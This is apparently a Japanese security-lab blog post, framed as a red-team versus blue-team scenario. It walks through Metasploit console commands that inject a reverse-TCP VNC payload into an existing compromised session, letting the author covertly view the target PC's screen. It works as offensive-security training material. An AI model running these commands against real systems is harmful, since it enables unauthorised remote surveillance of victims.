ウサギは後退せず、大きな耳で情報集めをする事に験を担ぎ、古来より日本では鎧などにウサギの図柄を取り入れてきたらしい。
読者です 読者をやめる 読者になる 読者になる

うさブロ

ぼっちなうさぎのセキュリティラボ

とある親父の侵入実験【Empire:皇帝の目?鷹の目?】

f:id:appleseedj073:20170503114540p:plain

今回は、とあるシナリオに基づいて実施します。

 

f:id:appleseedj073:20170509144956p:plain

「レッドチームとしては、なんとしてもブルーチームの操作画面を覗き見たい!これまで利用した標的型攻撃で得たブルーチームとのバックドアを利用して画面を盗み出せ!」

 

という命令が出たのでやってみます。

途中までの手順に関しては前々回の「皇帝との共闘」と一緒なんで、その後から書きます。

ra66itblog.hateblo.jp

 

監視モジュール準備

f:id:appleseedj073:20170509153248p:plain

現在接続されているセッションにVNCモジュールを送り込んでやる。

 

 msf exploit(handler) > use post/windows/manage/payload_inject
 msf post(payload_inject) > set payload windows/vncinject/reverse_tcp
 payload => windows/vncinject/reverse_tcp
 msf post(payload_inject) > set LHOST 192.168.1.100
 LHOST => 192.168.1.100
 msf post(payload_inject) > set session 1
 session => 1
 msf post(payload_inject) > set handler true
 handler => true

f:id:appleseedj073:20170509155006p:plain

準備ができたら実行

 msf post(payload_inject) > exploit

f:id:appleseedj073:20170509155147p:plain

色々と流れると・・・

 

f:id:appleseedj073:20170509155410p:plain

こんな感じに標的PCとの間にVNCで接続することができる。

 

相手との間の回線速度にもよるけど、案外快適に盗み見することが可能になりますw

 

「これで、ブルーチームの動向を確認することができる!」